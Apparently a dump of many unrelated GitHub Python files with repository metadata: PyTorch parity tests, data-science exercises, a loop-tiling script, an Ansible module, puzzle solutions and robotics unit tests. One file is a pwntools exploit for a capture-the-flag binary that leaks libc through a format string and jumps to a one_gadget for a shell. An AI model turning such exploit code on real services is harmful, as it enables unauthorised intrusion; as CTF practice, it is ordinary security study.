lambda: ([], {'dim_in': 4, 'dim_out': 4, 'temp_kernel_size': 4, 'stride': 1, 'dim_inner': 4, 'num_groups': 1}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
True),
(Conv2dSame,
lambda: ([], {'in_channels': 4, 'out_channels': 4, 'kernel_size': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
False),
(DropPath,
lambda: ([], {}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
False),
(Linear,
lambda: ([], {'in_features': 4, 'out_features': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(Mlp,
lambda: ([], {'in_features': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(Nonlocal,
lambda: ([], {'dim': 4, 'dim_inner': 4}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
False),
(ResNetBasicStem,
lambda: ([], {'dim_in': 4, 'dim_out': 4, 'kernel': 4, 'stride': 1, 'padding': 4}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
True),
(SE,
lambda: ([], {'dim_in': 4, 'ratio': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(Swish,
lambda: ([], {}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
False),
(X3DTransform,
lambda: ([], {'dim_in': 4, 'dim_out': 4, 'temp_kernel_size': 4, 'stride': 1, 'dim_inner': 4, 'num_groups': 1}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
False),
]
class Test_facebookresearch_TimeSformer(_paritybench_base):
def test_000(self):
self._check(*TESTCASES[0])
def test_001(self):
self._check(*TESTCASES[1])
def test_002(self):
self._check(*TESTCASES[2])
def test_003(self):
self._check(*TESTCASES[3])
def test_004(self):
self._check(*TESTCASES[4])
def test_005(self):
self._check(*TESTCASES[5])
def test_006(self):
self._check(*TESTCASES[6])
def test_007(self):
self._check(*TESTCASES[7])
def test_008(self):
self._check(*TESTCASES[8])
def test_009(self):
self._check(*TESTCASES[9])
def test_010(self):
self._check(*TESTCASES[10])
| [
"[email protected]"
] | |
9fde6b1cc14c9a979633c4f2df97f24dca4d78bb | 84290c584128de3e872e66dc99b5b407a7a4612f | /Supervised Learning with scikit-learn/Preprocessing and pipelines/Centering and scaling.py | c21eb26fe58bf9a8d53c990a24d3b0ab871dee0b | [] | no_license | BautizarCodigo/DataAnalyticEssentials | 91eddc56dd1b457e9e3e1e3db5fbbb2a85d3b789 | 7f5f3d8936dd4945ee0fd854ef17f04a04eb7b57 | refs/heads/main | 2023-04-11T04:42:17.977491 | 2021-03-21T19:05:17 | 2021-03-21T19:05:17 | 349,784,608 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 504 | py | # Import scale
from sklearn.preprocessing import scale
# Scale the features: X_scaled
X_scaled = scale(X)
# Print the mean and standard deviation of the unscaled features
print("Mean of Unscaled Features: {}".format(np.mean(X)))
print("Standard Deviation of Unscaled Features: {}".format(np.std(X)))
# Print the mean and standard deviation of the scaled features
print("Mean of Scaled Features: {}".format(np.mean(X_scaled)))
print("Standard Deviation of Scaled Features: {}".format(np.std(X_scaled))) | [
"[email protected]"
] | |
a8ba14a006fb88ac5415201cfab9678983738d9d | b47f2e3f3298388b1bcab3213bef42682985135e | /experiments/fdtd-2d/tmp_files/2238.py | 6dfcdd1cd9629a3c959c2e3b61310de6617d05bf | [
"BSD-2-Clause"
] | permissive | LoopTilingBenchmark/benchmark | 29cc9f845d323431e3d40e878cbfc6d1aad1f260 | 52a3d2e70216552a498fd91de02a2fa9cb62122c | refs/heads/master | 2020-09-25T09:45:31.299046 | 2019-12-04T23:25:06 | 2019-12-04T23:25:06 | 225,975,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/fdtd-2d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/fdtd-2d/tmp_files/2238.c')
procedure('kernel_fdtd_2d')
loop(0)
known(' nx > 1 ')
known(' ny > 1 ')
tile(1,2,20,2)
tile(1,4,16,4)
tile(2,2,20,2)
tile(2,4,16,4)
tile(3,2,20,2)
tile(3,4,16,4)
| [
"[email protected]"
] | |
bd6651931aed58d7bfd2c1949c7dea3b99edfd6c | b685036280331fa50fcd87f269521342ec1b437b | /src/data_mining_demo/py_shuJuWaJue_ruMen_yu_ShiJian/chapter3/demo2.py | 7e2ee679470b22f9af507b2f12f77a6431309659 | [] | no_license | chenqing666/myML_DM_Test | f875cb5b2a92e81bc3de2a0070c0185b7eacac89 | 5ac38f7872d94ca7cedd4f5057bb93732b5edbad | refs/heads/master | 2022-02-26T01:52:06.293025 | 2019-09-20T06:35:25 | 2019-09-20T06:35:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | import pickle
import numpy as np
import pandas as pd
datafile = "./cleanedData.dai"
with open(datafile, 'rb') as file:
dataset = pickle.load(file)
print(dataset.head()) | [
"[email protected]"
] | |
71b2e819f9b87e7fec810e93dc2fb3d1006ac89d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_combos.py | cac18802b80f0f4ecc83aabd2e7d23ba1ed8481a | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | py |
from xai.brain.wordbase.nouns._combo import _COMBO
#calss header
class _COMBOS(_COMBO, ):
def __init__(self,):
_COMBO.__init__(self)
self.name = "COMBOS"
self.specie = 'nouns'
self.basic = "combo"
self.jsondata = {}
| [
"[email protected]"
] | |
82812f0cb1ad89fee4e2c4ad453429f5b4e8cc8f | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_118/619.py | 85060cf54efea0ef148ad0160403ca71cbb9b978 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | # -*- coding: utf-8 -*-
import sys
def is_palindrome(num):
s1 = str(num)
s2 = s1[::-1]
return s1 == s2
fair_numbers = []
for i in range(pow(10, 7)+1):
if is_palindrome(i):
num = i*i
if is_palindrome(num):
fair_numbers.append(num)
N = int(sys.stdin.readline())
for T in range(1, N+1):
min_val, max_val = map(int, sys.stdin.readline().strip().split())
ans = 0
for num in fair_numbers:
if num < min_val:
continue
if num > max_val:
break
ans += 1
print 'Case #%(T)s: %(ans)s' % locals()
| [
"[email protected]"
] | |
c0056aa85383d670add5f74e627672b310c662ce | a867b1c9da10a93136550c767c45e0d8c98f5675 | /G_LC_1055_ShortestWaytoFormString.py | 057fd0b488c0696e709603ccc3d5993c1b5d2c98 | [] | no_license | Omkar02/FAANG | f747aacc938bf747129b8ff35b6648fb265d95b6 | ee9b245aa83ea58aa67954ab96442561dbe68d06 | refs/heads/master | 2023-03-25T19:45:08.153403 | 2021-03-28T07:13:08 | 2021-03-28T07:13:08 | 280,783,785 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 835 | py | # import __main__ as main
# from Helper.TimerLogger import CodeTimeLogging
# fileName = main.__file__
# fileName = fileName.split('\\')[-1]
# CodeTimeLogging(Flag='F', filename=fileName, Tag='String', Difficult='Medium')
def shotestWaytoFormString(scr, target):
numMinString = 0
remaning = target
while len(remaning) != 0:
subsequence = ""
i = j = 0
while i < len(scr) and j < len(remaning):
if scr[i] == remaning[j]:
subsequence += remaning[j]
j += 1
i += 1
if len(subsequence) == 0:
return -1
numMinString += 1
remaning = remaning[len(subsequence):]
return numMinString
scr = "abc"
target = "abcbc"
scr = "abc"
target = "abcdbc"
a = [1, 2, 3, 4, 5]
print(shotestWaytoFormString(scr, target))
| [
"[email protected]"
] | |
3ef7e25a59a3ca2672554115318f33e31822fd25 | e5dc27e634aba70bcd1b3acea74fed84ddccf837 | /plugins/modules/template_project.py | 432a757ecb62ba97acf49d326d6c97cb68fe269b | [] | no_license | jejrichardson/dnacenter-ansible | 264d1b52227d4bf78ad175494763cff9e7881f34 | f10078ef8323bda4b542e71bcecf4f80a7fe0609 | refs/heads/master | 2023-01-28T09:54:57.449459 | 2020-12-09T23:15:49 | 2020-12-09T23:15:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,792 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2020, Rafael Campos <[email protected]>
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {
"metadata_version": "0.0.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: template_project
short_description: Manage TemplateProject objects of ConfigurationTemplates
description:
- Returns the projects in the system.
- Creates a new project.
- Updates an existing project.
- Deletes an existing Project.
version_added: '1.0'
author: Rafael Campos (@racampos)
options:
name:
description:
- Name of project to be searched.
- ProjectDTO's name.
type: str
createTime:
description:
- ProjectDTO's createTime.
type: int
description:
description:
- ProjectDTO's description.
type: str
id:
description:
- ProjectDTO's id.
type: str
lastUpdateTime:
description:
- ProjectDTO's lastUpdateTime.
type: int
tags:
description:
- ProjectDTO's tags (list of strings).
type: list
templates:
description:
- ProjectDTO's templates.
type: dict
project_id:
description:
- ProjectId path parameter.
- Required for state delete.
type: str
requirements:
- dnacentersdk
seealso:
# Reference by module name
- module: cisco.dnac.plugins.module_utils.definitions.template_project
# Reference by Internet resource
- name: TemplateProject reference
description: Complete reference of the TemplateProject object model.
link: https://developer.cisco.com/docs/dna-center/api/1-3-3-x
# Reference by Internet resource
- name: TemplateProject reference
description: SDK reference.
link: https://dnacentersdk.readthedocs.io/en/latest/api/api.html#v2-1-1-summary
"""
EXAMPLES = r"""
- name: get_projects
cisco.dnac.template_project:
state: query # required
name: SomeValue # string
register: query_result
- name: create_project
cisco.dnac.template_project:
state: create # required
createTime: 1 # integer
description: SomeValue # string
id: SomeValue # string
lastUpdateTime: 1 # integer
name: SomeValue # string
tags:
- SomeValue # string
templates: None
- name: update_project
cisco.dnac.template_project:
state: update # required
createTime: 1 # integer
description: SomeValue # string
id: SomeValue # string
lastUpdateTime: 1 # integer
name: SomeValue # string
tags:
- SomeValue # string
templates: None
- name: delete_project
cisco.dnac.template_project:
state: delete # required
project_id: SomeValue # string, required
"""
RETURN = """
get_projects:
description: Returns the projects in the system.
returned: always
type: dict
contains:
payload:
description: It is the template project's payload.
returned: always
type: list
contains:
name:
description: It is the template project's name.
returned: always
type: str
sample: '<name>'
id:
description: It is the template project's id.
returned: always
type: str
sample: '478012'
templates:
description: It is the template project's templates.
returned: always
type: list
contains:
name:
description: It is the template project's name.
returned: always
type: str
sample: '<name>'
composite:
description: It is the template project's composite.
returned: always
type: bool
sample: false
id:
description: It is the template project's id.
returned: always
type: str
sample: '478012'
create_project:
description: Creates a new project.
returned: success
type: dict
contains:
response:
description: ProjectDTO's response.
returned: success
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: success
type: dict
url:
description: It is the template project's url.
returned: success
type: str
sample: '<url>'
version:
description: ProjectDTO's version.
returned: success
type: str
sample: '1.0'
update_project:
description: Updates an existing project.
returned: changed
type: dict
contains:
response:
description: ProjectDTO's response.
returned: changed
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: changed
type: dict
url:
description: It is the template project's url.
returned: changed
type: str
sample: '<url>'
version:
description: ProjectDTO's version.
returned: changed
type: str
sample: '1.0'
delete_project:
description: Deletes an existing Project.
returned: success
type: dict
contains:
response:
description: Response, property of the response body.
returned: success
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: success
type: dict
url:
description: It is the template project's url.
returned: success
type: str
sample: '<url>'
version:
description: Version, property of the response body.
returned: success
type: str
sample: '1.0'
"""
| [
"[email protected]"
] | |
ce4cb92d76d50fbd63accaff41bd8af8bbd952e1 | 0f9b6a33a5e2ce627db75d1bcc34bc3f3674335b | /sctf/2018/catchthebug/exploit.py | 10ff19c7084f606481adcd2e34de7136bf30a20a | [] | no_license | hnoson/writeups | 359a33b03286bab19359ad9b089e6f3bfe4fb708 | 05550e3c462108f6c5ba0b69f65694e2eb1dc9b3 | refs/heads/master | 2021-10-07T18:21:26.041101 | 2021-10-03T10:22:31 | 2021-10-03T10:22:31 | 119,823,623 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,927 | py | #!/usr/bin/env python
from pwn import *
def catch(name):
while True:
s.sendlineafter('>> ', '1')
s.recvline()
if s.recvline(False) == 'There is no bug =(':
continue
s.sendafter('>> ', name)
break
def inspect(num):
s.sendlineafter('>> ', '2')
ret = []
for i in range(num):
s.recvuntil('==\n')
ret.append((s.recvline(False), len(s.recvuntil('=')) - 2))
return ret
def submit(title = 'A' * 0x40, subtitle = 'A' * 0x80, body = 'A' * 0x100, tag = 'A' * 8, password = 'A' * 8):
s.sendlineafter('>> ', '3')
s.sendafter('title\n', title)
s.sendafter('subtitle\n', subtitle)
if len(body) < 0x100:
body += '\n'
s.sendafter('body\n', body)
if len(tag) < 8:
tag += '\n'
s.sendafter('tag\n', tag)
s.sendafter('password\n', password)
if __name__ == '__main__':
# context.log_level = 'DEBUG'
if len(sys.argv) == 1:
s = process('./bug_3e99623da36874fd424a4e237866e301d292aa66')
# s = process('./bug_3e99623da36874fd424a4e237866e301d292aa66', env = {'LD_PRELOAD': './libc-2.26.so_cc8df6278e095fcc4ca8a98e1f1c69c04db30a4c'})
else:
s = remote('catchthebug.eatpwnnosleep.com', 55555)
libc = ELF('./libc-2.26.so_cc8df6278e095fcc4ca8a98e1f1c69c04db30a4c')
one_gadgets = [0x47c46, 0x47c9a, 0xfccde, 0xfdb8e]
catch('%p\n')
catch('AAAA')
catch('AAAA')
res = inspect(3)
libc_base = int(res[0][0], 16) - libc.symbols['_IO_2_1_stdout_'] - 131
log.info('libc base: %#x' % libc_base)
length = 8 * 3 + sum([l for _, l in res]) + 0x40 + 0x80
log.info('report length: %#x' % length)
if length < 0x618:
print 'try again'
exit(0)
body = 'A' * (0x708 - length)
body += p64(libc_base + 0x608040 + 3840 - len(body) - 0x9)
tag = p64(libc_base + one_gadgets[2])
submit(body = body, tag = tag)
s.interactive()
| [
"[email protected]"
] | |
85614f4b027e1a236f12c98d6e2f0dbb9b39b778 | 2425ad0e81a695eb126b31f2ccf82dfd478851c3 | /tests/test_ets.py | d8636cb441a212b3bfaa502b4e83c50a972f032f | [
"MIT"
] | permissive | jhavl/ropy | 62ab28297ae7e4ee6076009777d28aff98fdb2a2 | 38b12369530253a16c22ef1f5be0bcb75053ffd8 | refs/heads/master | 2021-01-07T20:39:00.899851 | 2020-11-29T10:35:24 | 2020-11-29T10:35:24 | 241,814,788 | 17 | 3 | MIT | 2020-04-29T05:36:43 | 2020-02-20T06:55:34 | Python | UTF-8 | Python | false | false | 22,573 | py | #!/usr/bin/env python3
"""
Created on Fri May 1 14:04:04 2020
@author: Jesse Haviland
"""
import numpy.testing as nt
import numpy as np
import ropy as rp
import unittest
import spatialmath as sm
class TestETS(unittest.TestCase):
def test_panda(self):
panda = rp.Panda()
qz = np.array([0, 0, 0, 0, 0, 0, 0])
qr = panda.qr
nt.assert_array_almost_equal(panda.qr, qr)
nt.assert_array_almost_equal(panda.qz, qz)
nt.assert_array_almost_equal(
panda.gravity, np.array([[0], [0], [9.81]]))
def test_q(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
panda.q = q1
nt.assert_array_almost_equal(panda.q, q1)
panda.q = q2
nt.assert_array_almost_equal(panda.q, q2)
panda.q = q3
nt.assert_array_almost_equal(np.expand_dims(panda.q, 0), q3)
def test_getters(self):
panda = rp.Panda()
panda.qdd = np.ones((7, 1))
panda.qd = np.ones((1, 7))
panda.qdd = panda.qd
panda.qd = panda.qdd
def test_control_type(self):
panda = rp.Panda()
panda.control_type = 'v'
self.assertEqual(panda.control_type, 'v')
def test_base(self):
panda = rp.Panda()
pose = sm.SE3()
panda.base = pose.A
nt.assert_array_almost_equal(np.eye(4), panda.base.A)
panda.base = pose
nt.assert_array_almost_equal(np.eye(4), panda.base.A)
# def test_str(self):
# panda = rp.Panda()
# ans = '\nPanda (Franka Emika): 7 axis, RzRzRzRzRzRzRz, ETS\n'\
# 'Elementary Transform Sequence:\n'\
# '[tz(0.333), Rz(q0), Rx(-90), Rz(q1), Rx(90), tz(0.316), '\
# 'Rz(q2), tx(0.0825), Rx(90), Rz(q3), tx(-0.0825), Rx(-90), '\
# 'tz(0.384), Rz(q4), Rx(90), Rz(q5), tx(0.088), Rx(90), '\
# 'tz(0.107), Rz(q6)]\n'\
# 'tool: t = (0, 0, 0.103), RPY/xyz = (0, 0, -45) deg'
# self.assertEqual(str(panda), ans)
# def test_str_ets(self):
# panda = rp.Panda()
# ans = '[tz(0.333), Rz(q0), Rx(-90), Rz(q1), Rx(90), tz(0.316), '\
# 'Rz(q2), tx(0.0825), Rx(90), Rz(q3), tx(-0.0825), Rx(-90), '\
# 'tz(0.384), Rz(q4), Rx(90), Rz(q5), tx(0.088), Rx(90), '\
# 'tz(0.107), Rz(q6)]'
# self.assertEqual(str(panda.ets), ans)
def test_fkine(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
ans = np.array([
[-0.50827907, -0.57904589, 0.63746234, 0.44682295],
[0.83014553, -0.52639462, 0.18375824, 0.16168396],
[0.22915229, 0.62258699, 0.74824773, 0.96798113],
[0., 0., 0., 1.]
])
panda.q = q1
nt.assert_array_almost_equal(panda.fkine().A, ans)
nt.assert_array_almost_equal(panda.fkine(q2).A, ans)
nt.assert_array_almost_equal(panda.fkine(q3).A, ans)
nt.assert_array_almost_equal(panda.fkine(q3).A, ans)
self.assertRaises(TypeError, panda.fkine, 'Wfgsrth')
def test_fkine_traj(self):
panda = rp.Panda()
q = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
qq = np.c_[q, q, q, q]
ans = np.array([
[-0.50827907, -0.57904589, 0.63746234, 0.44682295],
[0.83014553, -0.52639462, 0.18375824, 0.16168396],
[0.22915229, 0.62258699, 0.74824773, 0.96798113],
[0., 0., 0., 1.]
])
TT = panda.fkine(qq)
nt.assert_array_almost_equal(TT[0].A, ans)
nt.assert_array_almost_equal(TT[1].A, ans)
nt.assert_array_almost_equal(TT[2].A, ans)
nt.assert_array_almost_equal(TT[3].A, ans)
def test_allfkine(self):
pm = rp.PandaMDH()
p = rp.Panda()
q = [1, 2, 3, 4, 5, 6, 7]
p.q = q
pm.q = q
p.allfkine()
r2 = pm.allfkine()
for i in range(7):
nt.assert_array_almost_equal(p.ets[i]._fk.A, r2[i].A)
p.allfkine(q)
for i in range(7):
nt.assert_array_almost_equal(p.ets[i]._fk.A, r2[i].A)
def test_jacob0(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = np.array([
[-1.61683957e-01, 1.07925929e-01, -3.41453006e-02,
3.35029257e-01, -1.07195463e-02, 1.03187865e-01,
0.00000000e+00],
[4.46822947e-01, 6.25741987e-01, 4.16474664e-01,
-8.04745724e-02, 7.78257566e-02, -1.17720983e-02,
0.00000000e+00],
[0.00000000e+00, -2.35276631e-01, -8.20187641e-02,
-5.14076923e-01, -9.98040745e-03, -2.02626953e-01,
0.00000000e+00],
[1.29458954e-16, -9.85449730e-01, 3.37672585e-02,
-6.16735653e-02, 6.68449878e-01, -1.35361558e-01,
6.37462344e-01],
[9.07021273e-18, 1.69967143e-01, 1.95778638e-01,
9.79165111e-01, 1.84470262e-01, 9.82748279e-01,
1.83758244e-01],
[1.00000000e+00, -2.26036604e-17, 9.80066578e-01,
-1.93473657e-01, 7.20517510e-01, -1.26028049e-01,
7.48247732e-01]
])
panda.q = q1
nt.assert_array_almost_equal(panda.jacob0(), ans)
nt.assert_array_almost_equal(panda.jacob0(q2), ans)
nt.assert_array_almost_equal(panda.jacob0(q3), ans)
nt.assert_array_almost_equal(panda.jacob0(q4), ans)
self.assertRaises(TypeError, panda.jacob0, 'Wfgsrth')
def test_hessian0(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = np.array([
[
[-4.46822947e-01, -6.25741987e-01, -4.16474664e-01,
8.04745724e-02, -7.78257566e-02, 1.17720983e-02,
0.00000000e+00],
[-6.25741987e-01, -3.99892968e-02, -1.39404950e-02,
-8.73761859e-02, -1.69634134e-03, -3.44399243e-02,
0.00000000e+00],
[-4.16474664e-01, -1.39404950e-02, -4.24230421e-01,
-2.17748413e-02, -7.82283735e-02, -2.81325889e-02,
0.00000000e+00],
[8.04745724e-02, -8.73761859e-02, -2.17748413e-02,
-5.18935898e-01, 5.28476698e-03, -2.00682834e-01,
0.00000000e+00],
[-7.78257566e-02, -1.69634134e-03, -7.82283735e-02,
5.28476698e-03, -5.79159088e-02, -2.88966443e-02,
0.00000000e+00],
[1.17720983e-02, -3.44399243e-02, -2.81325889e-02,
-2.00682834e-01, -2.88966443e-02, -2.00614904e-01,
0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00]
],
[
[-1.61683957e-01, 1.07925929e-01, -3.41453006e-02,
3.35029257e-01, -1.07195463e-02, 1.03187865e-01,
0.00000000e+00],
[1.07925929e-01, -2.31853293e-01, -8.08253690e-02,
-5.06596965e-01, -9.83518983e-03, -1.99678676e-01,
0.00000000e+00],
[-3.41453006e-02, -8.08253690e-02, -3.06951191e-02,
3.45709946e-01, -1.01688580e-02, 1.07973135e-01,
0.00000000e+00],
[3.35029257e-01, -5.06596965e-01, 3.45709946e-01,
-9.65242924e-02, 1.45842251e-03, -3.24608603e-02,
0.00000000e+00],
[-1.07195463e-02, -9.83518983e-03, -1.01688580e-02,
1.45842251e-03, -1.05221866e-03, 2.09794626e-01,
0.00000000e+00],
[1.03187865e-01, -1.99678676e-01, 1.07973135e-01,
-3.24608603e-02, 2.09794626e-01, -4.04324654e-02,
0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00]
],
[
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00],
[0.00000000e+00, -6.34981134e-01, -4.04611266e-01,
2.23596800e-02, -7.48714002e-02, -5.93773551e-03,
0.00000000e+00],
[0.00000000e+00, -4.04611266e-01, 2.07481281e-02,
-6.83089775e-02, 4.72662062e-03, -2.05994912e-02,
0.00000000e+00],
[0.00000000e+00, 2.23596800e-02, -6.83089775e-02,
-3.23085806e-01, 5.69641385e-03, -1.00311930e-01,
0.00000000e+00],
[0.00000000e+00, -7.48714002e-02, 4.72662062e-03,
5.69641385e-03, 5.40000550e-02, -2.69041502e-02,
0.00000000e+00],
[0.00000000e+00, -5.93773551e-03, -2.05994912e-02,
-1.00311930e-01, -2.69041502e-02, -9.98142073e-02,
0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00]
],
[
[-9.07021273e-18, -2.77555756e-17, -2.77555756e-17,
-1.11022302e-16, -2.77555756e-17, 0.00000000e+00,
-2.77555756e-17],
[-1.69967143e-01, -1.97756387e-17, 4.11786040e-17,
-1.48932398e-16, -5.07612940e-17, -8.38219650e-17,
-4.90138154e-17],
[-1.95778638e-01, 1.66579116e-01, -1.38777878e-17,
1.04083409e-17, -1.38777878e-17, 3.46944695e-18,
0.00000000e+00],
[-9.79165111e-01, -3.28841647e-02, -9.97525009e-01,
-4.16333634e-17, -1.14491749e-16, 1.38777878e-17,
-6.24500451e-17],
[-1.84470262e-01, 1.22464303e-01, -3.97312016e-02,
7.41195745e-01, -2.77555756e-17, 1.12757026e-16,
2.77555756e-17],
[-9.82748279e-01, -2.14206274e-02, -9.87832342e-01,
6.67336352e-02, -7.31335770e-01, 2.08166817e-17,
-6.07153217e-17],
[-1.83758244e-01, 1.27177529e-01, -3.36043908e-02,
7.68210453e-01, 5.62842325e-03, 7.58497864e-01,
0.00000000e+00]
],
[
[1.29458954e-16, -1.11022302e-16, 8.67361738e-17,
-4.16333634e-17, 5.55111512e-17, 2.77555756e-17,
5.55111512e-17],
[-9.85449730e-01, -6.36381327e-17, -1.02735399e-16,
-1.83043043e-17, -5.63484308e-17, 8.08886307e-18,
1.07112702e-18],
[3.37672585e-02, 9.65806345e-01, 8.32667268e-17,
-2.55871713e-17, 1.07552856e-16, 2.08166817e-17,
-5.20417043e-18],
[-6.16735653e-02, -1.90658563e-01, -5.39111251e-02,
-6.59194921e-17, -2.77555756e-17, 2.38524478e-17,
-4.16333634e-17],
[6.68449878e-01, 7.10033786e-01, 6.30795483e-01,
-8.48905588e-02, 0.00000000e+00, 3.46944695e-17,
2.77555756e-17],
[-1.35361558e-01, -1.24194307e-01, -1.28407717e-01,
1.84162966e-02, -1.32869389e-02, 2.77555756e-17,
-2.08166817e-17],
[6.37462344e-01, 7.37360525e-01, 5.99489263e-01,
-7.71850655e-02, -4.08633244e-02, 2.09458434e-02,
0.00000000e+00]
],
[
[0.00000000e+00, -6.59521910e-17, -1.31033786e-16,
-1.92457571e-16, 1.54134782e-17, -7.69804929e-17,
1.11140361e-17],
[0.00000000e+00, -2.77555756e-17, 7.15573434e-17,
1.65666092e-16, 1.38777878e-17, -8.67361738e-18,
3.46944695e-17],
[0.00000000e+00, -1.98669331e-01, 8.67361738e-18,
-1.46584134e-16, 6.02816408e-17, -3.12250226e-17,
6.11490025e-17],
[0.00000000e+00, -9.54435515e-01, 4.51380881e-02,
1.38777878e-17, 1.08420217e-16, 3.46944695e-18,
6.24500451e-17],
[0.00000000e+00, -2.95400686e-01, -1.24639152e-01,
-6.65899738e-01, -4.85722573e-17, -5.20417043e-18,
-5.55111512e-17],
[0.00000000e+00, -9.45442009e-01, 5.96856167e-02,
7.19317248e-02, 6.81888149e-01, -2.77555756e-17,
1.04083409e-17],
[0.00000000e+00, -2.89432165e-01, -1.18596498e-01,
-6.35513913e-01, 5.24032975e-03, -6.51338823e-01,
0.00000000e+00]
]
])
panda.q = q1
nt.assert_array_almost_equal(panda.hessian0(), ans)
nt.assert_array_almost_equal(panda.hessian0(q2), ans)
nt.assert_array_almost_equal(panda.hessian0(q3), ans)
nt.assert_array_almost_equal(panda.hessian0(q4), ans)
nt.assert_array_almost_equal(panda.hessian0(J0=panda.jacob0(q1)), ans)
nt.assert_array_almost_equal(panda.hessian0(
q1, J0=panda.jacob0(q1)), ans)
# self.assertRaises(ValueError, panda.hessian0)
self.assertRaises(ValueError, panda.hessian0, [1, 3])
self.assertRaises(TypeError, panda.hessian0, 'Wfgsrth')
self.assertRaises(
ValueError, panda.hessian0, [1, 3], np.array([1, 5]))
self.assertRaises(TypeError, panda.hessian0, [1, 3], 'qwe')
def test_manipulability(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = 0.006559178039088341
panda.q = q1
nt.assert_array_almost_equal(panda.manipulability(), ans)
nt.assert_array_almost_equal(panda.manipulability(q2), ans)
nt.assert_array_almost_equal(panda.manipulability(q3), ans)
nt.assert_array_almost_equal(panda.manipulability(q4), ans)
# self.assertRaises(ValueError, panda.manipulability)
self.assertRaises(TypeError, panda.manipulability, 'Wfgsrth')
self.assertRaises(
ValueError, panda.manipulability, [1, 3], np.array([1, 5]))
self.assertRaises(TypeError, panda.manipulability, [1, 3], 'qwe')
def test_jacobm(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = np.array([
[1.27080875e-17],
[2.38242538e-02],
[6.61029519e-03],
[8.18202121e-03],
[7.74546204e-04],
[-1.10885380e-02],
[0.00000000e+00]
])
panda.q = q1
nt.assert_array_almost_equal(panda.jacobm(), ans)
nt.assert_array_almost_equal(panda.jacobm(q2), ans)
nt.assert_array_almost_equal(panda.jacobm(q3), ans)
nt.assert_array_almost_equal(panda.jacobm(q4), ans)
nt.assert_array_almost_equal(panda.jacobm(J=panda.jacob0(q1)), ans)
# self.assertRaises(ValueError, panda.jacobm)
self.assertRaises(TypeError, panda.jacobm, 'Wfgsrth')
